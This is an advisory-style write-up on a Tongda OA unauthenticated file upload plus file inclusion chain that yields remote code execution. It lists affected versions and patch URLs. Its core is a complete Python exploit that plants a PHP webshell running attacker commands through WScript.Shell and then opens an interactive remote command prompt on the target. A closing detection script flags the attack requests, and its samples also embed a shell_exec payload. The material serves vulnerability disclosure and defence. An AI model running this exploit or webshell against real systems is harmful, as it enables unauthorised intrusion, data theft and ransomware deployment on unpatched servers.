Vulnerability description
Tongda OA is an office automation suite. Tongda recently disclosed on its official forum an incident in which a customer's Tongda OA server was hit by ransomware, and published patches for several product versions. The issue is a chain of two defects: an arbitrary file upload that needs no authentication, and a file inclusion in an interface script of the affected versions. An unauthenticated remote attacker can upload a PHP payload with a crafted request, then include that file through the second endpoint and obtain remote code execution.
About Tongda OA
Tongda OA is a general-purpose OA product developed by Beijing Tongda Xinke Technology Co., Ltd. It covers personal tasks, administrative office work, workflow approval, knowledge management, human resources management, organisational structure management and other enterprise information management functions. In 2015 Tongda Cloud OA joined the Alibaba Cloud enterprise application zone and has since provided cloud computing support to many small and medium-sized enterprises.
Affected versions
Tongda OA V11
Tongda OA 2017
Tongda OA 2016
Tongda OA 2015
Tongda OA 2013 Enhanced Edition
Tongda OA 2013
Fix
Version                 Patch package download URL
V11                     http://cdndown.tongda2000.com/oa/security/2020_A1.11.3.exe
2017                    http://cdndown.tongda2000.com/oa/security/2020_A1.10.19.exe
2016                    http://cdndown.tongda2000.com/oa/security/2020_A1.9.13.exe
2015                    http://cdndown.tongda2000.com/oa/security/2020_A1.8.15.exe
2013 Enhanced Edition   http://cdndown.tongda2000.com/oa/security/2020_A1.7.25.exe
2013                    http://cdndown.tongda2000.com/oa/security/2020_A1.6.20.exe
Reproduction
Download the OA installer from the official site.
On Windows run the TDOA11.3 installer and accept the default prompts.
The default user is admin with an empty password.
Upload the file
File inclusion
Script
```python
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
# Tongda OA: unauthenticated file upload + file inclusion -> remote code execution
import json
import re
import sys

import requests

UA = ("Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36")
BOUNDARY = "---------------------------27723940316706158781839860668"

# PHP payload: the target is a Windows install, so the WScript.Shell COM object
# runs the command sent in the POST field "cmd" and its stdout is echoed back.
WEBSHELL = (
    "<?php\r\n"
    "$command=$_POST['cmd'];\r\n"
    "$wsh = new COM('WScript.shell');\r\n"
    "$exec = $wsh->exec(\"cmd /c \".$command);\r\n"
    "$stdout = $exec->StdOut();\r\n"
    "$stroutput = $stdout->ReadAll();\r\n"
    "echo $stroutput;\r\n"
    "?>\n"
)


def multipart(fields):
    """Build a multipart/form-data body from (name, filename, content) tuples."""
    body = ""
    for name, filename, content in fields:
        body += "--%s\r\nContent-Disposition: form-data; name=\"%s\"" % (BOUNDARY, name)
        if filename is not None:
            body += "; filename=\"%s\"\r\nContent-Type: image/jpeg" % filename
        body += "\r\n\r\n%s\r\n" % content
    return body + "--%s--\r\n" % BOUNDARY


def oa_rce(url, ym, fid, command):
    """Include the uploaded file through gateway.php and run one command."""
    # gateway.php only includes a path that contains "general", hence the general/../
    # hop inside the traversal; the upload sits under attach/im/<YYMM>/<id>.jpg.
    include_path = "../../../general/../attach/im/%s/%s.jpg" % (ym, fid)
    data = {"json": json.dumps({"url": include_path}), "cmd": command}
    req = requests.post(url + "/ispirit/interface/gateway.php",
                        headers={"User-Agent": UA}, data=data)
    return req.text


def oa(url):
    """Upload the payload without credentials, then confirm it can be included.
    Returns (ym, fid) identifying the stored file, or None."""
    upurl = url + "/ispirit/im/upload.php"
    headers = {"User-Agent": UA, "Content-Type": "multipart/form-data; boundary=" + BOUNDARY}
    # P: any non-empty value makes upload.php start a session with that id instead of
    # requiring a logged-in user. DEST_UID must be non-empty; UPLOAD_MODE=1 makes the
    # response carry the stored attachment id.
    data = multipart([
        ("ATTACHMENT", "jpg", WEBSHELL),
        ("P", None, "1"),
        ("DEST_UID", None, "1222222"),
        ("UPLOAD_MODE", None, "1"),
    ])
    req = requests.post(url=upurl, headers=headers, data=data)
    # The response names the file as <YYMM>_<id>|jpg|...; YYMM is the upload-month
    # directory (the original PoC hardcoded 2003 = March 2020), <id> is the file name.
    m = re.search(r"(\d{4})_([^|]+)\|", req.text)
    if not m:
        print("[-] upload failed or response not recognised")
        return None
    ym, fid = m.group(1), m.group(2)
    if "php00py" in oa_rce(url, ym, fid, "echo php00py"):
        print("[+] OA RCE vulnerability ")
        return ym, fid
    print("[-] Not OA RCE vulnerability ")
    return None


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("usage: python3 oa_rce.py http://127.0.0.1:8181")
        sys.exit(1)
    url = sys.argv[1].rstrip("/")
    stored = oa(url)
    while stored:
        try:
            command = input("wran@shelLhost# ")
        except (KeyboardInterrupt, EOFError):
            break
        if command in ("exit", "quit"):
            break
        print(oa_rce(url, stored[0], stored[1], command))
```
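The two requests in the script above give a defender something concrete to look for while the patches are being rolled out: an upload.php POST that carries a P field (the session-id trick that skips the login check) with PHP code in the ATTACHMENT part, and a gateway.php POST whose json url walks out of general/ to a non-PHP file. The following is an added example, not part of the original write-up or of Tongda's code: it parses captured requests and applies those checks. The request records are constructed to mirror the PoC (the benign include target "general/index.php" is an assumed placeholder, not a known Tongda path).

```python
#!/usr/bin/env python3
"""Request-inspection rules for the Tongda OA upload + include chain (added example)."""
import json
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

BOUNDARY = "---------------------------27723940316706158781839860668"


@dataclass
class HttpRequest:
    method: str
    path: str
    content_type: str
    body: str


def multipart_fields(body, content_type):
    """Minimal multipart/form-data parser: {field_name: (filename or None, content)}."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        return {}
    marker = "--" + m.group(2)
    fields = {}
    for part in body.split(marker):
        part = part.strip()
        if not part or part == "--":
            continue
        head, _, content = part.partition("\r\n\r\n")
        name = re.search(r';\s*name="([^"]*)"', head)
        fname = re.search(r'filename="([^"]*)"', head)
        if name:
            fields[name.group(1)] = (fname.group(1) if fname else None, content)
    return fields


def inspect_request(req):
    """Return a list of findings for one request; an empty list means nothing suspicious."""
    findings = []
    if req.method != "POST":
        return findings
    path = urlsplit(req.path).path.lower()
    if path.endswith("/ispirit/im/upload.php"):
        fields = multipart_fields(req.body, req.content_type)
        # A non-empty P makes upload.php start a session with that id instead of
        # checking for a logged-in user: the unauthenticated-upload indicator.
        if fields.get("P", (None, ""))[1]:
            findings.append("upload.php: P field supplied (login check bypass)")
        att = fields.get("ATTACHMENT")
        if att and re.search(r"<\?(php|=)", att[1], re.I):
            findings.append("upload.php: ATTACHMENT content contains a PHP open tag")
    elif path.endswith("/ispirit/interface/gateway.php"):
        for raw in parse_qs(req.body).get("json", []):
            try:
                target = json.loads(raw).get("url", "")
            except (ValueError, AttributeError):
                continue
            if ".." in target.replace("\\", "/").split("/"):
                findings.append("gateway.php: include target uses directory traversal: %s" % target)
            if not target.lower().endswith(".php"):
                findings.append("gateway.php: include target is not a .php file: %s" % target)
    return findings


def _multipart(fields):
    """Build a multipart body from (name, filename, content) tuples (for the samples)."""
    body = ""
    for name, filename, content in fields:
        body += '--%s\r\nContent-Disposition: form-data; name="%s"' % (BOUNDARY, name)
        if filename is not None:
            body += '; filename="%s"\r\nContent-Type: image/jpeg' % filename
        body += "\r\n\r\n%s\r\n" % content
    return body + "--%s--\r\n" % BOUNDARY


# Constructed samples: the first two mirror the PoC, the last two are benign-looking.
MULTIPART_CT = "multipart/form-data; boundary=" + BOUNDARY
SAMPLE_UPLOAD = HttpRequest("POST", "/ispirit/im/upload.php", MULTIPART_CT, _multipart([
    ("ATTACHMENT", "jpg", "<?php echo shell_exec($_POST['cmd']); ?>"),
    ("P", None, "1"), ("DEST_UID", None, "1222222"), ("UPLOAD_MODE", None, "1"),
]))
SAMPLE_INCLUDE = HttpRequest(
    "POST", "/ispirit/interface/gateway.php", "application/x-www-form-urlencoded",
    'json={"url":"../../../general/../attach/im/2003/1234567.jpg"}&cmd=whoami')
BENIGN_UPLOAD = HttpRequest("POST", "/ispirit/im/upload.php", MULTIPART_CT, _multipart([
    ("ATTACHMENT", "photo.jpg", "\xff\xd8\xff\xe0 JFIF bytes"),
    ("DEST_UID", None, "42"), ("UPLOAD_MODE", None, "1"),
]))
BENIGN_INCLUDE = HttpRequest(
    "POST", "/ispirit/interface/gateway.php", "application/x-www-form-urlencoded",
    'json={"url":"general/index.php"}')  # assumed placeholder for a normal include target

if __name__ == "__main__":
    for label, req in [("upload", SAMPLE_UPLOAD), ("include", SAMPLE_INCLUDE),
                       ("benign upload", BENIGN_UPLOAD), ("benign include", BENIGN_INCLUDE)]:
        print(label, inspect_request(req) or ["clean"])
```

The P-field rule is the one worth alerting on by itself: a legitimate IM upload comes from a browser that already holds a session cookie and has no reason to pass a session id in the form body. The gateway.php rules need the include target, so they only work at a layer that sees the POST body (WAF, reverse proxy, or full request capture), not in a plain access log.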